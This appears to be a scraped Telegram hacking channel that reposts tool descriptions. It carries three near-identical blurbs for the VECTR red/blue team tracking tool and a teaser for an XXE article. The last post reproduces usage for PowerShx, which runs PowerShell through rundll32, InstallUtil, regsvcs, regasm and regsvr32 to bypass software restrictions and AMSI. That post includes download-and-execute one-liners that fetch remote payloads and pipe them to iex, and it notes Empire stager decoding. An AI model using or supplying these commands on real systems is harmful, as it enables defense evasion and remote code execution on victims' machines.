Hacking Articles Tips Tricks Videos Tutorials
468 subscribers
65.9K photos
15 videos
157 files
132K links
Exploit
Pentesting
Hacking
Red Team
Blue Team
Kali Linux
Bug Bounty
Black Hat
Cyber security etc

@Hacking_Video
@Hacking_attack
Download Telegram
VECTR - A Tool That Facilitates Tracking Of Your Red And Blue Team Testing Activities To Measure Detection And Prevention Capabilities Across Different Attack Scenarios
http://www.kitploit.com/2021/10/vectr-tool-that-facilitates-tracking-of.html

___________________________
@hacking_Attack
@Hacking_Video
VECTR documentation can be found here: https://docs.vectr.io (https://docs.vectr.io/)VECTR Community Discord Channel: https://discord.gg/2FRd8zf728VECTR is a tool that facilitates tracking of your red and blue team (https://www.kitploit.com/search/label/Blue%20Team) testing activities to measure detection and prevention capabilities across different attack scenarios. VECTR provides the ability to create assessment groups, which consist of a collection of Campaigns and supporting Test Cases to simulate adversary threats. Campaigns can be broad and span activity across the kill chain, from initial compromise to privilege escalation (https://www.kitploit.com/search/label/Privilege%20Escalation) and lateral movement (https://www.kitploit.com/search/label/Lateral%20Movement) and so on, or can be a narrow in scope to focus on specific detection layers, tools, and infrastructure. VECTR is designed to promote full transparency (https://www.kitploit.com/search/label/Transparency) between offense and defense, encourage training between team members, and improve detection & prevention success rate across the environment.
VECTR is focused on common indicators of attack and behaviors that may be carried out by any number of threat actor groups, with varying objectives and levels of sophistication. VECTR can also be used to replicate the step-by-step TTPs associated with specific groups and malware campaigns, however its primary purpose is to replicate attacker behaviors that span multiple threat actor groups and malware campaigns, past, present and future. VECTR is meant to be used over time with targeted campaigns, iteration, and measurable enhancements to both red team skills and blue team detection capabilities. Ultimately the goal of VECTR is to make a network resilient to all but the most sophisticated adversaries and insider attacks.

___________________________
@hacking_Attack
@Hacking_Video
VECTR - A Tool That Facilitates Tracking Of Your Red And Blue Team Testing Activities To Measure Detection And Prevention Capabilities Across Different Attack Scenarios

VECTR documentation can be found here: https://docs.vectr.ioVECTR Community Discord Channel: https://discord.gg/2FRd8zf728VECTR is a tool that facilitates tracking of your red and blue team testing activities to measure detection and prevention capabilities across different attack scenarios. VECTR provides the ability to create assessment groups, which consist of a collection of Campaigns and supporting Test Cases to simulate adversary threats. Campaigns can be broad and span activity across the kill chain, from initial compromise to privilege escalation and lateral movement and so on, or can be a narrow in scope to focus on specific detection layers, tools, and infrastructure. VECTR is designed to promote full transparency between offense and defense, encourage training between team members, and improve detection & prevention success rate across the environment.VECTR is focused on common indicators of attack and behaviors that may be carried out by any number of threat actor groups, with varying objectives and levels of sophistication. VECTR can also be used to replicate the step-by-step TTPs associated with specific groups and malware campaigns, however its primary purpose is to replicate attacker behaviors that span multiple threat actor groups and malware campaigns, past, present and future. VECTR is meant to be used over time with targeted campaigns, iteration, and measurable enhancements to both red team skills and blue team detection capabilities. Ultimately the goal of VECTR is to make a network resilient to all but the most sophisticated adversaries and insider attacks.DocumentationFeature Breakdowns By ReleaseVECTR v7.1.1 Feature BreakdownTeamLEAD PROGRAMMERS:Carl VonderheidGalen FisherDaniel HongPROGRAMMERS:Andrew ScottPatrick HislopDan GuzekZara GunnerNick GalanteDESIGN & REQUIREMENTS:Phil WainwrightDEV OPS:Paul SpencerGRAPHIC DESIGN & MARKETING:Doug WebsterLicensePlease see the EULAAtomic Red LICENSEDownload VECTR
Read more...

___________________________
@hacking_Attack
@Hacking_Video
Hacking Articles Tips Tricks Videos Tutorials
Photo
KitPloit - PenTest Tools!
VECTR - A Tool That Facilitates Tracking Of Your Red And Blue Team Testing Activities To Measure Detection And Prevention Capabilities Across Different Attack Scenarios

https://blogger.googleusercontent.com/img/a/AVvXsEgTKYlc7Rr_KNhAeovT7TwgUQW2rvAGNBuNCuICdO2SIXAX-diWirGvt-EGw_ZZfRN8SonGKyCK8aWhSgDe-HndtVGPlrp9RiPLUGV_MJ359lJk5YgAqpFmX8Z73Kr5bojrOz0NqgR5PUZWv2veqCp5RBrhJsmsEHv0tbdtox67jk5lSYDP2sCYP-DAQA=w640-h278 VECTR documentation can be found here: https://docs.vectr.io

VECTR Community Discord Channel: https://discord.gg/2FRd8zf728

VECTR is a tool that facilitates tracking of your red and blue team testing activities to measure detection and prevention capabilities across different attack scenarios. VECTR provides the ability to create assessment groups, which consist of a collection of Campaigns and supporting Test Cases to simulate adversary threats. Campaigns can be broad and span activity across the kill chain, from initial compromise to privilege escalation and lateral movement and so on, or can be a narrow in scope to focus on specific detection layers, tools, and infrastructure. VECTR is designed to promote full transparency between offense and defense, encourage training between team members, and improve detection & prevention success rate across the environment.
VECTR is focused on common indicators of attack and behaviors that may be carried out by any number of threat actor groups, with varying objectives and levels of sophistication. VECTR can also be used to replicate the step-by-step TTPs associated with specific groups and malware campaigns, however its primary purpose is to replicate attacker behaviors that span multiple threat actor groups and malware campaigns, past, present and future. VECTR is meant to be used over time with targeted campaigns, iteration, and measurable enhancements to both red team skills and blue team detection capabilities. Ultimately the goal of VECTR is to make a network resilient to all but the most sophisticated adversaries and insider attacks. https://blogger.googleusercontent.com/img/a/AVvXsEhOkSyYZgMwsBNU0CcRVvUxlu0rJ8mtD3UmLnQydgkhTAvrn8Ts1o4k0MP7Cc97if_8PeFLqvpKZZ2FBkj6OCzMzU0PTIyhis57aoV4cfhFQ3ATIA1_5NaTTSJAAIr2IpHR9r6vd0IgQCiFA-11VL0QdQC4q5FaJG6I_EWUuUyaNKCrlc25bJX8AJd5KQ=w640-h422 https://blogger.googleusercontent.com/img/a/AVvXsEiJLsHtHa_yZM-HtpLpDyzKz1Dp8Tzmhg7og1KO2vmtTDQtfJ9H0kaLMJnb5dNY1tAmLgPZrX7OWomHqXeueJpF7RuUoIj9v_JCN2qlecqko5T8WRy2_YepnmFB7tav6Dy_mKVTWaIIlfXsxywh5Lj8YKPCMf8YVmdLPLDutMeuWihDg84Tz98Mmenneg=w640-h488 https://blogger.googleusercontent.com/img/a/AVvXsEjbnBANhzM6a4VWB9ldzzZSpo-14PYqFGtmJW-r9-Rgf2BoXAenwJQo1hdXLGeXnC7DpgKnUO2rpBW9SkA835mzlWH_KgL_z_SBKWyj6shMlvyOMajDpyfD99MrhlyQATL722Psfmf-eFkiR5MNYMITkXjx0Bz2E_T28Z64JSqpTNdnUkujYl0g11w__Q=w640-h594 DocumentationFeature Breakdowns By ReleaseVECTR v7.1.1 Feature Breakdown TeamLEAD PROGRAMMERS:

* Carl Vonderheid
* Galen Fisher
* Daniel Hong

PROGRAMMERS:

* Andrew Scott
* Patrick Hislop
* Dan Guzek
* Zara Gunner
* Nick Galante

DESIGN & REQUIREMENTS:

* Phil Wainwright

DEV OPS:

* Paul Spencer

GRAPHIC DESIGN & MARKETING:

* Doug Webster LicensePlease see the EULA

Atomic Red LICENSE Download VECTR

___________________________
@hacking_Attack
@Hacking_Video
XXE, how did a feature become a critical vulnerability?

This is my take on XML External Entities and how a feature of this front-end language intrigued the security researchers and how it was…Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
PowerShx : Run Powershell Without Software Restrictions

PowerShx is a rewrite and expansion on the PowerShdll project. PowerShx provide functionalities for bypassing AMSI and running PS Cmdlets.

Features

* Run Powershell with DLLs using rundll32.exe, installutil.exe, regsvcs.exe or regasm.exe, regsvr32.exe.
* Run Powershell without powershell.exe or powershell_ise.exe
* AMSI Bypass features.
* Run Powershell scripts directly from the command line or Powershell files
* Import Powershell modules and execute Powershell Cmdlets.

Usage

.dll version

rundll32

rundll32 PowerShx.dll,main -e
rundll32 PowerShx.dll,main -f Run the script passed as argument
rundll32 PowerShx.dll,main -f -c Load a script and run a PS cmdlet
rundll32 PowerShx.dll,main -w Start an interactive console in a new window
rundll32 PowerShx.dll,main -i Start an interactive console
rundll32 PowerShx.dll,main -s Attempt to bypass AMSI
rundll32 PowerShx.dll,main -v Print Execution Output to the console

Alternatives (Credit to SubTee for these techniques):

*
x86 – C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
x64 – C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
*
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe PowerShx.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe PowerShx.dll
*
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U PowerShx.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U PowerShx.dll
*
regsvr32 /s /u PowerShx.dll –>Calls DllUnregisterServer
regsvr32 /s PowerShx.dll –> Calls DllRegisterServer

.exe version

PowerShx.exe -i Start an interactive console
PowerShx.exe -e
PowerShx.exe -f Run the script passed as argument
PowerShx.exe -f -c Load a script and run a PS cmdlet
PowerShx.exe -s Attempt to bypass AMSI.

Embedded Payloads

Payloads can be embedded by updating the data dictionary “Common.Payloads.PayloadDict” in the “Common” project and calling it in the method PsSession.cs -> Handle() . Example: in Handle() method:

private void Handle(Options options)
{
// Pre-execution before user script
_ps.Exe(Payloads.PayloadDict[“amsi”]);
}

Examples

Run a base64 encoded script

rundll32 PowerShx.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String(“BASE64”)) ^| iex
PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String(“BASE64”)) ^| iex

Note: Empire stagers need to be decoded using [System.Text.Encoding]::Unicode

Run a base64 encoded script

rundll32 PowerShx.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;
PowerShx.exe -e “IEX ((new-object net.webclient).downloadstring(‘http://192.168.100/payload-http’))”

Requirements

.NET 4
Download

___________________________
@hacking_Attack
@Hacking_Video